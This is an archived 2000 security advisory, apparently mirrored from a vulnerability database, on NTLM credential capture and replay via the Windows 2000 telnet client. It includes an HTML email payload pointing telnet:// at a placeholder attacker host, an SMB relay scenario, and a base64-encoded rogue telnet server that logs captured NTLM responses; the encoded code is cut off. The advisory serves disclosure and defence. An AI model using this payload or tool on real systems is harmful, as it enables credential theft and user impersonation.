Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:685
HistorySep 15, 2000 - 12:00 a.m.

@stake Advisory: NTLM Replaying via Windows 2000 Telnet Client (A 091400-1)

2000-09-1500:00:00
vulners.com
79
JSON

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I wish this could have gone out sooner but there was an issue with
the initial Microsoft patch which we found during our testing. They
subsequently decided to fix the patch which delayed things a bit.
We feel that if a vendor is taking an issue seriously and working
diligently on a patch that we should hold off on vulnerability details
and demonstration code until they have a chance to complete the fix
properly.

Be advised that the URLs included in the Vendor Response section of our
advisory may not have replicated to all the Microsoft web servers yet.

Weld Pond
[email protected]

                        @stake Inc.
                      www.atstake.com

                     Security Advisory

Advisory Name: NTLM Replaying via Windows 2000 Telnet Client (A091400-1)
Release Date: 09/14/2000
Application: Windows 2000 Telnet Client
Platform: Windows 2000
Severity: Attacker can impersonate users on the network
Author: DilDog [[email protected]]
Vendor Status: Vendor has patch
Web: www.atstake.com/research/advisories/2000/a091400-1.txt

Executive Summary:

    The telnet client in Windows 2000 may be launched via e-mail or

web browsing, causing undesirable outbound authentication over the
Internet to an untrusted third party. This can lead to compromised
passwords or stolen credentials.

Overview:

    The console telnet client that is packaged with Windows 2000

performs NTLM authentication by default, assuming that is going to be
connecting to a Windows 2000 telnet server. This, however, is not
necessarily the case, and it attempts authentication with any host it
contacts. This combined with the fact that many email and web browser
packages will parse the "telnet://" protocol and launch the telnet client
to the desired host can lead to outbound NTLM authentications. These
authentications can be cracked to determine passwords, or replayed to
illegitimately access networked resources. The protocol used in the NTLM
telnet transaction is described in detail below, and a proof of concept
tool is provided that demonstrates the negotiation and logs responses from
the client.

Detailed Description:

    Windows 2000 is packaged with a console mode telnet client,

specially designed for connecting to the Windows Telnet Server. Amongst
the modifications to the standard telnet protocol, Microsoft has added a
negotiation type to authenticate via NTLM with the target server, per the
IETF working draft:
http://www.ietf.org/internet-drafts/draft-tso-telnet-auth-enc-05.txt

The NTLM protocol is authentication type 15. The telnet client will
attempt negotiation with any server on the Internet, regardless of zone
control or otherwise, unless NTLM authentication has been disabled in the
telnet client (it is on by default).

Initially, this seems benign, but when combined with the fact that
Microsoft Internet Explorer, Outlook, Outlook Express, and Netscape
Navigator and Messenger will all open telnet automatically when they
encounter a "telnet://" URL. This allows an attacker to craft an email in
the following format that forces an outbound authentication over any port:

<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet://evil.ip.address:port>
</frameset>
</html>

Note that this attack affects a multitude of HTML parsers, and is not
reliant upon any form of Active Scripting, Javascript or otherwise, to
launch the telnet client to the desired host.

One of the severe ramafications of this is the ability for the NTLM
challenge/response to be replayed to access a network resource. The
scenario is as follows:

A=attacker
C=client
S=server (network resource to attack)
C has legitimate access to S

  1. 'A' sends evil framed email to 'C'.
  2. 'C' reads email, opens telnet connection to 'A'
  3. 'A' receives telnet connection and makes SMB connection to 'S'.
  4. 'S' receives SMB connection and sends challenge to 'A'
  5. 'A' sends challenge to 'C'.
  6. 'C' receives challenge, encrypts with hash, and sends response to 'A'.
  7. 'A' receives response and sends it to 'S'.
  8. 'S' receives response and authenticates 'A' to access requested SMB
    share.

Another attack that is possible, is that since the challenge is chosen by
the telnet server, a challenge could be specially chosen to send to the
telnet client such that the response more easily cracked than with a
random challenge. This effectively removes the extra complexity added by
the challenge response mechanism that one normally encounters while
attempting to crack passwords that were sniffed off of a network
transaction.

The normal NTLM challenge/response negotiation sequence occurs in the
telnet protocol data stream in the following fashion:

Nomenclature

IAC=255,DONT=254,DO=253,WONT=252,WILL=251,SB=250,SE=240
AUTH=37,IS=0,SEND=1,REPLY=2,NAME=3,NTLM=15
DD=32 bit little endian data
DW=16 bit little endian data
DB=8 bit little endian data
US=Unicode string, no extra null terminator
AS=Ansi string, no extra null terminator

Client Server
======================== ========================
IAC WILL AUTH
IAC SB AUTH
SEND NTLM 0x00 IAC SE
IAC SB AUTH
IS NTLM 0x00 0x00
DD 0x00000020 ; Length
DD 0x00000002 ; Type
AS "NTLMSSP\0" ; Signature
DD 0x00000001 ; Sequence #
DD 0xE0008297 ; ?Flags?
DD 0x00000000 ; Padding (room for client challenge?)
DD 0x00000000
DD 0x00000000
DD 0x00000000
IAC SE
IAC SB AUTH
REPLY NTLM 0x00 0x01
DD 0x000000A8 ; Length
DD 0x00000002 ; Type
AS "NTLMSSP\0" ; Signature
DD 0x00000002 ; Sequence#
DW 0x0014,0x0014 ; Field
; length (min/max)
DD 0x00000030 ; Offset
; from start
DD 0xE0828295 ; ?Flags?
DB 0x01 0x02 0x03 0x04 ; 8 byte
DB 0x02 0x03 0x04 0x05 ; Challenge
DD 0x00000000 ; Padding
DD 0x00000000
DW 0x0064,0x0064 ; Next
; Field
; length(min/max)
DD 0x00000044 ; Offset
; from start
… other fields…
IAC SB AUTH
IS NTLM 0x00 0x02
DD 0x000000B4 ; Length
DD 0x00000002 ; Type
AS "NTLMSSP\0" ; Signature
DD 0x00000003 ; Sequence
DW 0x0018,0x0018 ; NTLM Response Field length (min/max)
DD 0x00000074 ; NTLM Response Offset
DW 0x0018,0x0018 ; LM Response Field length (min/max)
DD 0x0000008C ; LM Response Offset
DW 0x0014,0x0014 ; Domain Name Field length (min/max)
DD 0x00000040 ; Domain Name Offset
DW 0x000C,0x000C ; User Name Field length (min/max)
DD 0x00000054 ; User Name Offset
DW 0x0014,0x0014 ; Machine Name Field length (min/max)
DD 0x00000060 ; Machine Name Offset
DW 0x0010,0x0010 ; ??? Field length (min/max)
DD 0x000000A4 ; ??? Offset
DD 0xE0808295 ; ?Flags?
US "ABCDEGHIJK" ; Domain Name
US "foobar" ; User Name
US "ABCDEGHIJK" ; Machine Name
DB 1,2,3,4,5,6,7,8 ; 24 Bytes of NTLM Response
DB 1,2,3,4,5,6,7,8
DB 1,2,3,4,5,6,7,8
DB 1,2,3,4,5,6,7,8 ; 24 Bytes of LM Response
DB 1,2,3,4,5,6,7,8
DB 1,2,3,4,5,6,7,8
DB 1,2,3,4,5,6,7,8 ; 16 Bytes of Unknown Cruft
DB 1,2,3,4,5,6,7,8
IAC SE
IAC SB AUTH
REPLY NTLM 0x00 0x03
DD 0xFDFFF0FF ; Flags?
DB 0x18

Temporary Solution:

    Run &quot;telnet&quot; at the command prompt, enter &quot;unset ntlm&quot; and then

exit telnet to save your preferences into the registry. You may go so far
as removing the telnet URL type from the registry if you are a proficient
registry hacker, unsetting the NTLM authentication should be sufficient
until an official patch is available.

Vendor Response:

Microsoft has released a bulletin and patch for this issue.

Bulletin MS00-067
http://www.microsoft.com/technet/security/bulletin/MS00-067.asp

Frequently Asked Questions:
http://www.microsoft.com/technet/security/bulletin/fq00-067.asp

Patch:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24319

Proof-of-Concept Code:

    This code will act as a rogue telnet server, and send a constant

challenge of 0xFF bytes to any telnet client that connects to it, and it
logs the response to a disk file. The code was written under Linux.

=====================
Content-Description: NTLM Rogue Telnet Server
Content-Disposition: attachment; filename="talkntlm.cpp"
Content-Transfer-Encoding: BASE64
Content-Type: text/plain

LyogVGFsa05UTE0gLSBOVExNIExvZ2dpbmcgVGVsbmV0IFNlcnZlcgogKiBkaWxkb2dAYXRz
dGFrZS5jb20KICogOC8xNC8wMAogKiBDb3B5cmlnaHQgKEMpIDIwMDAgQHN0YWtlLCBJbmMu
CiAqLwoKI2luY2x1ZGU8c3RkaW8uaD4KI2luY2x1ZGU8c3RyaW5nLmg+CiNpbmNsdWRlPHVu
aXN0ZC5oPgojaW5jbHVkZTxzdGRsaWIuaD4KI2luY2x1ZGU8Y3R5cGUuaD4KI2luY2x1ZGU8
c3lzL3NvY2tldC5oPgojaW5jbHVkZTxzeXMvdHlwZXMuaD4KI2luY2x1ZGU8c3lzL3dhaXQu
aD4KI2luY2x1ZGU8bmV0aW5ldC9pbi5oPgojaW5jbHVkZTxhcnBhL2luZXQuaD4KCiNkZWZp
bmUgTUFKT1JfVkVSU0lPTiAxCiNkZWZpbmUgTUlOT1JfVkVSU0lPTiAwCgojZGVmaW5lIElB
QyAgICAgMjU1ICAgICAgICAgICAgIC8qIGludGVycHJldCBhcyBjb21tYW5kOiAqLwojZGVm
aW5lIERPTlQgICAgMjU0ICAgICAgICAgICAgIC8qIHlvdSBhcmUgbm90IHRvIHVzZSBvcHRp
b24gKi8KI2RlZmluZSBETyAgICAgIDI1MyAgICAgICAgICAgICAvKiBwbGVhc2UsIHlvdSB1
c2Ugb3B0aW9uICovCiNkZWZpbmUgV09OVCAgICAyNTIgICAgICAgICAgICAgLyogSSB3b24n
dCB1c2Ugb3B0aW9uICovCiNkZWZpbmUgV0lMTCAgICAyNTEgICAgICAgICAgICAgLyogSSB3
aWxsIHVzZSBvcHRpb24gKi8KI2RlZmluZSBTQiAgICAgIDI1MCAgICAgICAgICAgICAvKiBp
bnRlcnByZXQgYXMgc3VibmVnb3RpYXRpb24gKi8gICAgICAgICAgICAgIAojZGVmaW5lIFNF
ICAgICAgMjQwICAgICAgICAgICAgIC8qIGVuZCBzdWIgbmVnb3RpYXRpb24gKi8KI2RlZmlu
ZSBBVVRIICAgIDM3CiNkZWZpbmUgSVMgICAgICAwCiNkZWZpbmUgU0VORCAgICAxCiNkZWZp
bmUgUkVQTFkgICAyCiNkZWZpbmUgTkFNRSAgICAzCiNkZWZpbmUgTlRMTSAgICAxNQoKI2Rl
ZmluZSBBQ0NFUFQgMQoKdHlwZWRlZiBlbnVtIHsKICBNRVRIT0RfTk9ORT0wLAogIE1FVEhP
RF9URUxORVQKfSBNRVRIT0Q7Cgp0eXBlZGVmIGVudW0gewogIFNVQk1FVEhPRF9OT05FPTAs
CiAgU1VCTUVUSE9EX0xPRywKfSBTVUJNRVRIT0Q7CgojZGVmaW5lIENPTU1TT0NLX0JVRlNJ
WiAyMDQ4CkZJTEUgKmdfZkNvbW1Tb2NrOwpjaGFyIGdfQ29tbVNvY2tCdWZbQ09NTVNPQ0tf
QlVGU0laXTsKCnZvaWQgZXJyb3IoY29uc3QgY2hhciAqc3RyKQp7CiAgZmZsdXNoKHN0ZG91
dCk7CiAgZnByaW50ZihzdGRlcnIsc3RyKTsKICBmZmx1c2goc3RkZXJyKTsKfQoKdW5zaWdu
ZWQgY2hhciBnZXRiKHZvaWQpCnsKICB1bnNpZ25lZCBjaGFyIGI9MDsKICBmcmVhZCgmYiwx
LDEsZ19mQ29tbVNvY2spOwogIHJldHVybiBiOwp9Cgp1bnNpZ25lZCBzaG9ydCBnZXRkd2wo
dm9pZCkKewogIHVuc2lnbmVkIHNob3J0IHM9MDsKICBzfD0oKHVuc2lnbmVkIHNob3J0KWdl
dGIoKSk7CiAgc3w9KCh1bnNpZ25lZCBzaG9ydClnZXRiKCkpPDw4OwogIHJldHVybiBzOwp9
Cgp1bnNpZ25lZCBsb25nIGdldGRkbCh2b2lkKQp7CiAgdW5zaWduZWQgbG9uZyBsPTA7CiAg
bHw9KCh1bnNpZ25lZCBsb25nKWdldGIoKSk7CiAgbHw9KCh1bnNpZ25lZCBsb25nKWdldGIo
KSk8PDg7CiAgbHw9KCh1bnNpZ25lZCBsb25nKWdldGIoKSk8PDE2OwogIGx8PSgodW5zaWdu
ZWQgbG9uZylnZXRiKCkpPDwyNDsKICByZXR1cm4gbDsKfQoKdm9pZCBwdXRiKHVuc2lnbmVk
IGNoYXIgYykKewogIGZ3cml0ZSgmYywxLDEsZ19mQ29tbVNvY2spOwp9Cgp2b2lkIHB1dGR3
bCh1bnNpZ25lZCBzaG9ydCB3KQp7CiAgcHV0Yih3JjI1NSk7CiAgcHV0Yigodz4+OCkmMjU1
KTsKfQoKdm9pZCBwdXRkZGwodW5zaWduZWQgbG9uZyBkKQp7CiAgcHV0YihkJjI1NSk7CiAg
cHV0YigoZD4+OCkmMjU1KTsKICBwdXRiKChkPj4xNikmMjU1KTsKICBwdXRiKChkPj4yNCkm
MjU1KTsKfQoKCnZvaWQgcHV0YXJyYihpbnQgbiwgdW5zaWduZWQgY2hhciAqYikKewogIGlu
dCBpOwogIGZvcihpPTA7aTxuO2krKykgewogICAgcHV0YihiW2ldKTsKICB9Cn0KCnZvaWQg
cHV0YXJyYyhpbnQgbiwgY2hhciAqYykKewogIHB1dGFycmIobiwodW5zaWduZWQgY2hhciAq
KWMpOwp9Cgp2b2lkIHB1dGZsdXNoKHZvaWQpCnsKICBmZmx1c2goZ19mQ29tbVNvY2spOwp9
CgoKdm9pZCBkZWJ1Z2IodW5zaWduZWQgY2hhciBjKQp7CiAgZnByaW50ZihzdGRlcnIsIiVk
XHRcdCVYXHQnJWMnXG5cciIsYyxjLChpc2FsbnVtKGMpP2M6JyAnKSk7Cn0KCgppbnQgbGlz
dGVucG9ydChpbnQgcG9ydCwgc3RydWN0IHNvY2thZGRyX2luICpyc2FkZHIpCnsKICAvLyBD
cmVhdGUgc29ja2V0CiAgaW50IHM9c29ja2V0KEFGX0lORVQsU09DS19TVFJFQU0sSVBQUk9U
T19UQ1ApOwogIGlmKHM8MCkgewogICAgZXJyb3IoImNvdWxkbid0IGNyZWF0ZSBzb2NrZXQu
XG4iKTsKICAgIHJldHVybiAtMTsKICB9CgogIGludCByZXVzZT0xOwogIGlmKHNldHNvY2tv
cHQocyxTT0xfU09DS0VULFNPX1JFVVNFQUREUiwmcmV1c2Usc2l6ZW9mKGludCkpPDApIHsK
ICAgIGVycm9yKCJjb3VsZG4ndCBzZXQgc29ja2V0IG9wdGlvbi5cbiIpOwogICAgY2xvc2Uo
cyk7CiAgICByZXR1cm4gLTI7CiAgfQoKICAvLyBCaW5kIHRvIHBvcnQKICBzdHJ1Y3Qgc29j
a2FkZHJfaW4gc2FkZHI7CiAgbWVtc2V0KCZzYWRkciwwLHNpemVvZihzdHJ1Y3Qgc29ja2Fk
ZHJfaW4pKTsKICBzYWRkci5zaW5fcG9ydD1odG9ucyhwb3J0KTsKICBzYWRkci5zaW5fZmFt
aWx5PUFGX0lORVQ7CiAKICBpZihiaW5kKHMsKHN0cnVjdCBzb2NrYWRkciAqKSZzYWRkcixz
aXplb2Yoc3RydWN0IHNvY2thZGRyX2luKSk8MCkgewogICAgZXJyb3IoImNvdWxkbid0IGJp
bmQuXG4iKTsKICAgIGNsb3NlKHMpOwogICAgcmV0dXJuIC0zOwogIH0KCiAgLy8gTGlzdGVu
IG9uIHBvcnQ7CiAgaWYobGlzdGVuKHMsMSk8MCkgewogICAgZXJyb3IoImNvdWxkbid0IGxp
c3Rlbi5cbiIpOwogICAgY2xvc2Uocyk7CiAgICByZXR1cm4gLTQ7CiAgfQoKICAvLyBBY2Nl
cHQgY29ubmVjdGlvbgogIHVuc2lnbmVkIGludCBzb2NrbGVuPXNpemVvZihzdHJ1Y3Qgc29j
a2FkZHJfaW4pOwogIG1lbXNldChyc2FkZHIsMCxzb2NrbGVuKTsKICBpbnQgYXM7CiAgaWYo
KGFzPWFjY2VwdChzLChzdHJ1Y3Qgc29ja2FkZHIgKilyc2FkZHIsJnNvY2tsZW4pKTwwKSB7
CiAgICBlcnJvcigiY291bGRuJ3QgYWNjZXB0LlxuIik7CiAgICBjbG9zZShzKTsKICAgIHJl
dHVybiAtNTsKICB9CgogIC8vIENsb3NlIGxpc3RlbmVyCiAgY2xvc2Uocyk7CiAgCiAgcmV0
dXJuIGFzOwp9CgppbnQgZG9fdGVsbmV0X2xvZyhpbnQgcG9ydCwgY2hhciAqbG9nZmlsZSkK
ewoKICBGSUxFICpsZj1OVUxMOwoKICB3aGlsZSgxKSB7CiAgICAKICAgIC8vIFdhaXQgZm9y
IHRlbG5ldCBjb25uZWN0aW9uIHRvIGNvbWUgaW4KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiBz
YWRkcjsKICAgIGludCBzOwogICAgcHJpbnRmKCJsaXN0ZW5pbmcgb24gcG9ydCAlZC5cbiIs
cG9ydCk7CiAgICBpZigocz1saXN0ZW5wb3J0KHBvcnQsJnNhZGRyKSk8MCkgewogICAgICBl
cnJvcigidGVsbmV0IGxvZ2dpbmcgYWJvcnQuXG4iKTsKICAgICAgcmV0dXJuIC0xOwogICAg
fQogICAgcHJpbnRmKCJyZWNpZXZlZCB0ZWxuZXQgY29ubmVjdGlvbiBmcm9tICVzOiV1Llxu
IiwKCSAgIGluZXRfbnRvYShzYWRkci5zaW5fYWRkciksbnRvaHMoc2FkZHIuc2luX3BvcnQp
KTsKCiAgICAvLyBTZXQgdGhpcyBzb2NrZXQgYXMgb3V0IGJ1ZmZlcmVkIHBhY2tldCBzb2Nr
ZXQKICAgIGdfZkNvbW1Tb2NrPWZkb3BlbihzLCJyK2IiKTsKICAgIGlmKGdfZkNvbW1Tb2Nr
PT1OVUxMKSB7CiAgICAgIGVycm9yKCJjb3VsZG4ndCBmZG9wZW4gY29tbSBzb2NrZXQuXG4i
KTsKICAgICAgY2xvc2Uocyk7CiAgICAgIHJldHVybiAtMjsKICAgIH0KICAgIHNldHZidWYo
Z19mQ29tbVNvY2ssZ19Db21tU29ja0J1ZixfSU9GQkYsQ09NTVNPQ0tfQlVGU0laKTsKCiAg
ICAvLyBPcGVuIGxvZ2dpbmcgZmlsZQogICAgbGY9Zm9wZW4obG9nZmlsZSwiYSt0Iik7CiAg
ICBpZihsZj09TlVMTCkgewogICAgICBlcnJvcigiY291bGRuJ3Qgb3BlbiBsb2cgZmlsZS5c
biIpOwogICAgICBmY2xvc2UoZ19mQ29tbVNvY2spOwogICAgICByZXR1cm4gLTM7CiAgICB9
CiAgICAKICAgIC8vIENoYWxsZW5nZSB0byBzZW5kCiAgICB1bnNpZ25lZCBjaGFyIGNoYWxs
ZW5nZVs4XT17MjU1LDI1NSwyNTUsMjU1LDI1NSwyNTUsMjU1LDI1NX07CgogICAgLy8gU3Rh
cnQgYXV0aGVudGljYXRpb24gcHJvY2VzcwogICAgdW5zaWduZWQgY2hhciAqcmVzcGJ1Zj1O
VUxMOwogICAgaW50IHNpemU9MDsKICAgIAogICAgcHV0YihJQUMpOwogICAgcHV0YihETyk7
CiAgICBwdXRiKEFVVEgpOwogICAgcHV0Zmx1c2goKTsKICAgIHByaW50ZigiPj4gSUFDIERP
IEFVVEhcbiIpOwogICAgCiAgICAvLyBTZWUgaWYgY2xpZW50IHdhbnRzIHRvIGF1dGhlbnRp
Y2F0ZQogICAgaWYoZ2V0YigpIT1JQUMpIGdvdG8gdGVsbmV0bG9nZmFpbDsKICAgIGlmKGdl
dGIoKSE9V0lMTCkgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0YigpIT1BVVRIKSBn
b3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBwcmludGYoIjw8IElBQyBXSUxMIEFVVEhcbiIpOwog
ICAgCiAgICAvLyBQcmVzZW50IGF1dGhlbnRpY2F0aW9uIG1ldGhvZHMKICAgIHB1dGIoSUFD
KTsKICAgIHB1dGIoU0IpOwogICAgcHV0YihBVVRIKTsKICAgIHB1dGIoU0VORCk7CiAgICBw
dXRiKE5UTE0pOwogICAgcHV0YigwKTsKICAgIHB1dGIoSUFDKTsKICAgIHB1dGIoU0UpOwog
ICAgcHV0Zmx1c2goKTsKICAgIHByaW50ZigiPj4gSUFDIFNCIEFVVEggU0VORCBOVExNIDAg
SUFDIFNFXG4iKTsKICAgIAogICAgLy8gR2V0IE5UTE1TU1AgaW5pdGlhbCByZXF1ZXN0CiAg
ICBpZihnZXRiKCkhPUlBQykgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0YigpIT1T
QikgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0YigpIT1BVVRIKSBnb3RvIHRlbG5l
dGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPUlTKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBp
ZihnZXRiKCkhPU5UTE0pIGdvdG8gdGVsbmV0bG9nZmFpbDsKICAgIGlmKGdldGIoKSE9MCkg
Z290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0YigpIT0wKSBnb3RvIHRlbG5ldGxvZ2Zh
aWw7CiAgICAKICAgIHNpemU9Z2V0ZGRsKCkrNDsKICAgIGlmKHNpemU+MjA0OCkgZ290byB0
ZWxuZXRsb2dmYWlsOwogICAgcmVzcGJ1Zj0odW5zaWduZWQgY2hhciAqKW1hbGxvYyhzaXpl
KTsKICAgIGludCBpOwogICAgZm9yKGk9MDtpPHNpemU7aSsrKSB7CiAgICAgIHJlc3BidWZb
aV09Z2V0YigpOwogICAgfQogICAgZnJlZShyZXNwYnVmKTsKICAgIGlmKGdldGIoKSE9SUFD
KSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPVNFKSBnb3RvIHRlbG5ldGxv
Z2ZhaWw7CiAgICAKICAgIHByaW50ZigiPDwgSUFDIFNCIEFVVEggSVMgTlRMTSAwIDAgLi4u
IElBQyBTRVxuIik7CiAgICAKICAgIC8vIFNlbmQgYWNjZXB0CiAgICBwdXRiKElBQyk7CiAg
ICBwdXRiKFNCKTsKICAgIHB1dGIoQVVUSCk7CiAgICBwdXRiKFJFUExZKTsKICAgIHB1dGIo
TlRMTSk7CiAgICBwdXRiKDApOwogICAgcHV0YihBQ0NFUFQpOwogICAgCiAgICBwdXRkZGwo
MHhBOCk7CiAgICBwdXRkZGwoMHgyKTsKICAgIHB1dGFycmMoOCwiTlRMTVNTUCIpOwogICAg
cHV0ZGRsKDB4Mik7CiAgICBwdXRkd2woMHgxNCk7CiAgICBwdXRkd2woMHgxNCk7CiAgICBw
dXRkZGwoMHgzMCk7CiAgICBwdXRkZGwoMHhFMDgyODI5NSk7CiAgICBwdXRhcnJiKDgsY2hh
bGxlbmdlKTsKICAgIHB1dGFycmMoOCwiXDBcMFwwXDBcMFwwXDBcMCIpOwogICAgcHV0ZHds
KDB4NjQpOwogICAgcHV0ZHdsKDB4NjQpOwogICAgcHV0ZGRsKDB4NDQpOwogICAgcHV0YXJy
YygyMCwiQVwwQlwwQ1wwRFwwRVwwRlwwR1wwSFwwSVwwSlwwIik7CiAgICBwdXRkd2woMHgy
KTsKICAgIHB1dGR3bCgweDE0KTsKICAgIHB1dGFycmMoMjAsIkFcMEJcMENcMERcMEVcMEZc
MEdcMEhcMElcMEpcMCIpOwogICAgcHV0ZHdsKDB4MSk7CiAgICBwdXRkd2woMHgxNCk7CiAg
ICBwdXRhcnJjKDIwLCJBXDBCXDBDXDBEXDBFXDBGXDBHXDBIXDBJXDBKXDAiKTsKICAgIHB1
dGR3bCgweDQpOwogICAgcHV0ZHdsKDB4MTQpOwogICAgcHV0YXJyYygyMCwiQVwwQlwwQ1ww
RFwwRVwwRlwwR1wwSFwwSVwwSlwwIik7CiAgICBwdXRkd2woMHgzKTsKICAgIHB1dGR3bCgw
eDE0KTsgIAogICAgcHV0YXJyYygyMCwiQVwwQlwwQ1wwRFwwRVwwRlwwR1wwSFwwSVwwSlww
Iik7CiAgICBwdXRkZGwoMCk7CgogICAgcHV0YihJQUMpOwogICAgcHV0YihTRSk7CiAgICBw
dXRmbHVzaCgpOwogICAgcHJpbnRmKCI+PiBJQUMgU0IgQVVUSCBSRVBMWSBOVExNIDAgMSAu
Li4gY2hhbGxlbmdlIC4uLiBJQUMgU0VcbiIpOwogIAogICAgLy8gR2V0IHRoZSByZXBseSBw
YWNrZXQKICAgIGlmKGdldGIoKSE9SUFDKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihn
ZXRiKCkhPVNCKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPUFVVEgpIGdv
dG8gdGVsbmV0bG9nZmFpbDsKICAgIGlmKGdldGIoKSE9SVMpIGdvdG8gdGVsbmV0bG9nZmFp
bDsKICAgIGlmKGdldGIoKSE9TlRMTSkgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0
YigpIT0wKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPTIpIGdvdG8gdGVs
bmV0bG9nZmFpbDsKCiAgICBzaXplPWdldGRkbCgpKzQ7CiAgICBpZihzaXplPjIwNDggfHwg
c2l6ZTw2NCkgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgcHJpbnRmKCI4XG4iKTsKICAgIHJl
c3BidWY9KHVuc2lnbmVkIGNoYXIgKiltYWxsb2Moc2l6ZSk7CiAgICBmb3IoaT0wO2k8c2l6
ZTtpKyspIHsKICAgICAgcmVzcGJ1ZltpXT1nZXRiKCk7CiAgICAgIC8vZnByaW50ZihzdGRl
cnIsIiUyLjJYOiAiLGkpOwogICAgICAvL2RlYnVnYihyZXNwYnVmW2ldKTsKICAgIH0KICAg
IGlmKGdldGIoKSE9SUFDKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPVNF
KSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CgogICAgcHJpbnRmKCI8PCBJQUMgU0IgQVVUSCBJUyBO
VExNIDAgMiAuLi4gcmVzcG9uc2U

JSON